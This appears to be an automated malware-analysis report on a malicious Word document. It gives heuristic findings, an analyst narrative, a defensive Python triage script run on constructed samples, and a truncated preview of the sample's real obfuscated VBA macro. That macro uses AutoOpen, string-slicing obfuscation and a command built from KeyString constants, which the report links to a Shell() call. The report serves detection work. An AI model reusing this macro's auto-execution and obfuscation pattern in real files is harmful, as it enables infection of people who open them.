Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, so the code runs as soon as the document is opened with macros enabled; this is the standard entry point for a macro-based downloader. The critical heuristic for a Shell() call in VBA shows that the macro hands a command string to the operating system. Combined with AutoOpen this is the usual pattern for launching a second-stage payload, although the static evidence establishes execution of a command, not a confirmed download. The command itself is not visible in plain text: the extracted source assembles strings from Mid/MidB/Left/Right slices of long junk identifiers, and the argument to the wrapper call BvdFkbn begins with KeyString(vbKeyC) + KeyString(vbKeyM), which builds characters from virtual-key constants so that a token such as "cmd" never appears literally. Two caveats for triage: the only URL extracted (http://schemas.openxmlformats.org/drawingml/2006/main) is a standard OOXML schema namespace found in the document body, not a download or command-and-control address, so static analysis yields no network indicator; and the legacy WordBasic auto-exec heuristic states that no VBA project was recovered even though olevba carved a 175 KB VBA source, so treat that medium finding as overlapping with the AutoOpen detection rather than as independent evidence. Delivery is most consistent with a spearphishing attachment, and the ClamAV signature Doc.Malware.00536d-6696772-0 corroborates the verdict.
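As an added illustration of the heuristics on this page (this is example code, not the analyzer's implementation and not the sample's code), the following Python triages an extracted VBA source the way OLE_VBA_AUTOOPEN and OLE_VBA_SHELL do, and additionally resolves runs of KeyString(vbKeyX) terms and measures the density of Mid/MidB/Left/Right slicing that marks the junk-string obfuscation seen in this macro. Both VBA inputs are constructed for the example and only imitate the shape of the real macro; the assumption that Word's KeyString returns the key's own letter for vbKeyA..vbKeyZ is noted in the code.

```python
import re
from dataclasses import dataclass, field

# Constructed VBA samples for this example. MALICIOUS_VBA imitates the shape of
# the macro in the report (an AutoOpen entry point, strings assembled from
# Mid/MidB/Left/Right slices of junk identifiers, a wrapper whose argument
# starts with KeyString key constants, and a Shell sink). It is not the real
# sample and nothing here executes VBA.
MALICIOUS_VBA = r'''
Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    Dim a(1)
    a(0) = Mid(x1 + x2 + x3, 768, 654) + MidB(y1 + y2, 385, 853) + Left(z1 + z2, 650)
    Dim b(1)
    b(0) = Left(q1 + q2, 886) + Right(r1 + r2, 648)
    RunIt (KeyString(vbKeyC) + KeyString(vbKeyM) + KeyString(vbKeyD) + Helper)
End Sub
Function Helper()
    Helper = Mid(w1 + w2, 649, 7) + Left(v1 + v2, 306)
End Function
Sub RunIt(cmd)
    Shell cmd, vbHide
End Sub
'''

# A constructed benign macro, to show the triage does not fire on ordinary code.
BENIGN_VBA = r'''
Sub FormatTable()
    Selection.Tables(1).Style = "Grid Table 4"
End Sub
'''

# Auto-execution entry points (Word and Excel) that run on open/close.
AUTOEXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b',
    re.I | re.M)
# Sinks that hand a string to the OS, or create a COM object that can.
EXEC_SINKS = re.compile(r'\b(Shell|ShellExecute|CreateObject|WScript\.Shell)\b', re.I)
# String-slicing builtins used to assemble strings from junk at runtime.
SLICERS = re.compile(r'\b(Mid|MidB|Left|Right|Chr|ChrW|StrReverse)\s*\(', re.I)
# Single KeyString(vbKeyX) terms, and runs of them joined with '+'.
KEYSTRING = re.compile(r'KeyString\(\s*vbKey([A-Z0-9])\s*\)', re.I)
KEYSTRING_RUN = re.compile(r'(?:KeyString\(\s*vbKey[A-Z0-9]\s*\)\s*(?:\+\s*)?)+', re.I)


@dataclass
class Triage:
    autoexec: list = field(default_factory=list)
    sinks: list = field(default_factory=list)
    keystring_strings: list = field(default_factory=list)
    slice_calls: int = 0
    code_lines: int = 0
    slice_density: float = 0.0
    verdict: str = "info"


def decode_keystring_runs(src: str) -> list:
    """Turn each run of KeyString(vbKeyX) + KeyString(vbKeyY) ... into the
    letters it spells. Assumption (not verified against Word here): Word's
    Application.KeyString returns the key's own character for vbKeyA..vbKeyZ
    and vbKey0..vbKey9, case aside."""
    return ["".join(KEYSTRING.findall(run.group(0))).upper()
            for run in KEYSTRING_RUN.finditer(src)]


def triage_vba(src: str) -> Triage:
    t = Triage()
    t.autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    t.sinks = sorted({m.group(0) for m in EXEC_SINKS.finditer(src)})
    t.keystring_strings = decode_keystring_runs(src)
    code = [ln for ln in src.splitlines()
            if ln.strip() and not ln.lstrip().startswith("Attribute ")]
    t.code_lines = len(code)
    t.slice_calls = len(SLICERS.findall(src))
    t.slice_density = t.slice_calls / max(t.code_lines, 1)
    # Severity mirrors the report's heuristics: an auto-exec entry point plus
    # an execution sink is critical; either alone is high; heavy slicing with
    # neither is only an obfuscation hint.
    if t.autoexec and t.sinks:
        t.verdict = "critical"
    elif t.autoexec or t.sinks:
        t.verdict = "high"
    elif t.slice_density > 0.5:
        t.verdict = "medium"
    return t


if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_VBA), ("benign", BENIGN_VBA)):
        r = triage_vba(src)
        print(name, r.verdict, r.autoexec, r.sinks, r.keystring_strings,
              f"slice density {r.slice_density:.2f}")
```

Run it on the decoded source that olevba produces (macros.bas in this report) rather than on the raw OLE container; the regexes operate on VBA text. The slice-density figure is a hint, not a detection on its own: legitimate string-handling code also calls Mid and Left, which is why the verdict only reaches critical when an auto-exec entry point and an execution sink are both present.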
Heuristics 6

- ClamAV: Doc.Malware.00536d-6696772-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6696772-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 175081 bytes |

SHA-256: c3ab1dfd8e9840b59d043e56de7df1d700c3f62faf7b2b460778fd39d977000c

Preview script: first 1,000 lines of the extracted script (the preview itself is truncated below)

```vb
Attribute VB_Name = "blAhHXwjoRIjs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Dim IjYzFD(1)
    IjYzFD(0) = Mid(ZuAzqBpZvdi + NjAFnzdilMWLhzKHGWJNlqmvUihk + XuAXtRDVs, 768, 654) + MidB(fUpPoXHjuDS + ADJEEcWInwmNoSDhWNHbiPtMNddq + iQAMnjFn, 385, 853) + MidB(cbipfNhmnCtbi + PJiJwQdiRrtmaoummSiXwQJ + bWYhzYpipi, 692, 521) + Left(KXnUvMzJfhsBs + jtnUIGBtKtNkDjKLnzKvNiVSrrp + DsIpwGqlJida, 650)
    Dim FzWjOS(1)
    FzWjOS(0) = Left(WzZmnoJBVvjj + qOFzoKVhVfGjNsIjOlGmUDzzcHiAvX + IaQdHQoc, 886) + Right(aRjMMSvL + rltqLsaqiLIDkNSkiqzPcWhwuSizMAIQpXm + OlPUwXhTit, 648)
    Dim wVHPm(1)
    wVHPm(0) = Mid(LIKVdtDj + bPzukXnEFumtKbbZiziKtQozL + mlonhMdSMzTL, 649, 7) + Left(PztoObKnRt + iwYcAWYwFdPLcOmAKdrYA + UKbBWoHXo, 306) + MidB(KLcGaKWidCLhY + tcmXXKlCNizionXzDWiWRNdnlRztcsw + BsBhYIOYdciWpf, 229, 589) + Left(DLFVJuW + OoUqstrVHBoDTzolvRwOaptCpjiGLZXA + lpdzJEcN, 976)
    Dim wwAOz(1)
    wwAOz(0) = Right(LzYDhpEAkDfzLJ + mHndGjzvFrkOcRTzMCtWSrCpcjOaIVANHL + fAcwpEqXTiLzz, 124) + Left(uJVlEqULqRc + EQHLYXtttINiWwXQnZSwqBj + QHXczwONEla, 663) + MidB(BAHjZUWnZpaF + SQKojNcmklEikTfBTRwiRJUJdhiBru + nblzaEOPWfrMlU, 902, 771) + Mid(JTUisiP + ECjMoiofDPUYoCMmSIXImmlJbFjGkWEKNmT + worYnhURlVFM, 130, 636)
    Dim tLbhz(1)
    tLbhz(0) = Mid(fGQAvFWSzvfV + vIYmAwTSFGUaZpiQOGnvFIPOEEX + iTzDCvwsT, 245, 19) + MidB(UGzdRfROSrW + dkhOOhSCwbmfURNTrZoIQbmsVC + bwjSMLFwSrd, 463, 531) + MidB(lKAAzJzPuobQn + zzkDApvCECOjFvQhukUBMSdhpikuRX + dnYWBpIvwkZsPw, 460, 888) + MidB(aHdzXlW + XUHwMbGRJYiLZYDlRqGqZPzWQjPm + jkbqnMQIjvkzUO, 640, 87)
    Dim IpaCV(1)
    IpaCV(0) = Left(TIjCksVaTOb + uVGFQrqjdupNrFwsAOXQDikYQvmzf + XmiVmdWqpN, 127) + Left(AQdaOPqFWF + jTaorwziqUSXOhMYiRNXzSLjPQRAhfv + wBwRIijj, 951) + Right(AidhoCG + waWfNhSZTicHWQWjnhqCCIjhmjMiY + OWfSEaLHMLjas, 225) + Right(ERTUlFYT + AfpHHKpUItrjMbZdqrVZZHMESBJwL + ajRFEVlXDTT, 754)
    Dim skqQRd(1)
    skqQRd(0) = Mid(PFqlMWYocpwM + VJJLFcuipLluPDSSwzKSviOY + rHhFMOjGGYGm, 632, 313) + Mid(sbJlJWwDjiLqOc + PvzEEOiWMMaCuovqmPudU + WdDqrdhCXkS, 496, 917)
    Dim jPwwU(2)
    jPwwU(0) = MidB(fYwLwCbwsvzhSj + UwwAcQZArpYAtaSiNSIBVFWlzj + bGCbwVc, 382, 295) + Right(cFMCwzVfOrAQtL + vFibRzoNSzRwqHTNXjDalcEULa + PBrhNkYi, 571)
    jPwwU(1) = Mid(jwisiYjhCWfBVs + wMicndpBaFJtisCiJTbDjctmmjzWpirZRzo + JjRdPqw, 247, 567) + MidB(MYEpOqhAtq + biTLrQbCqNRXRshluGdKQiCLa + SPGOquviHwCaf, 286, 222)
    BvdFkbn (KeyString(vbKeyC) + KeyString(vbKeyM) + QiOPYSH + sfUzLNkNtU + QCqjSiWo + BzBiuCkM + OwKYAQRQ + mEoVScvZsF)
    Dim VitAvf(2)
    VitAvf(0) = MidB(zNtHfjKkd + mnXrcNCSiVknKiacVmpoUZK + lSKwmtLswrQms, 257, 711) + Right(cGzwGhFckZz + RSjMjYTzuzpcldYEEqwEjs + FTCTNtuZzGfj, 245)
    VitAvf(1) = Left(iLwHdwp + BtvNUOwUnNFvbiMRHzrrnlSsllC + EvSUwhEiJ, 221) + Right(CwjjMLvkYI + BHbCWLiwwBzJRzAHmMSlmjIZZHErwm + qGCMwchZE, 958) + MidB(vOucpKWzjWo + mJrvGFMAwuFWzJhpzidLMbClPLj + jzLTpizsX, 499, 940) + Left(XSKNSqozUfIziU + wpPmdWXnpOjwbIjENaCtsfSOUDWKJ + bkhUWBvXXd, 531)
End Sub

Attribute VB_Name = "sWctRQU"
Function QiOPYSH()
    Dim cUnoQl(1)
    cUnoQl(0) = MidB(YZiivNQKQTTh + UVGKrTZUUBwRpJNqTFYQbYOPhmQCYGoz + AIiJEEhmiXGuC, 556, 992) + Left(famildEriEzY + LkVpKWOpCpuqjnCvVIWsNOfdR + iNTVvJhnoFWTlj, 789) + Right(vEzQwcptpsHb + wqpUbaVNdBANqolIYXtiNllicFRZMJMZd + NQQiazQim, 802) + Mid(jjElLjT + qwtHMcoDdZLpLGcznYTDXBhqHYBqJphWU + NVbiIQtOrYz, 175, 222)
    Dim qCHBja(1)
    qCHBja(0) = MidB(TwsjzCXNiBZ + buWjUOlXjzJaavdQYCvRzGbOmWdZoR + HlULMhIkB, 675, 180) + MidB(ikScXZcc + YszzAFXVIijhrNpOIOEwzDmLzQrPm + wSMiHidNAqaBsW, 294, 645)
    Dim nfsHVF(2)
    nfsHVF(0) = Mid(jfciBAKplEYZ + YpYinpSKPpuOBdMCVhzjhrOjjLEmWrvH + qSqTWQmonwIL, 479, 38) + MidB(TwZIrnYJiwKDY + vaiMCrPiusEQYCjiXziurDujk + jQPsNku, 801, 16) + MidB(YqNwiIk + ITtzGNjmIKiAcoXLnsMifTbr + UlvZNzPXQmzEH, 632, 848) + Mid(YNCWukZYSv + jfVzuoWOFfwFYlLiqquDiiWaAVB + iJjGiEN, 860, 409)
    nfsHVF(1) = Right(liGQVzOpiP + lcrVXNWtDsRwoijiWQaRwXGFBHM + jlwiniqfzjQsF, 7 ... (truncated)
```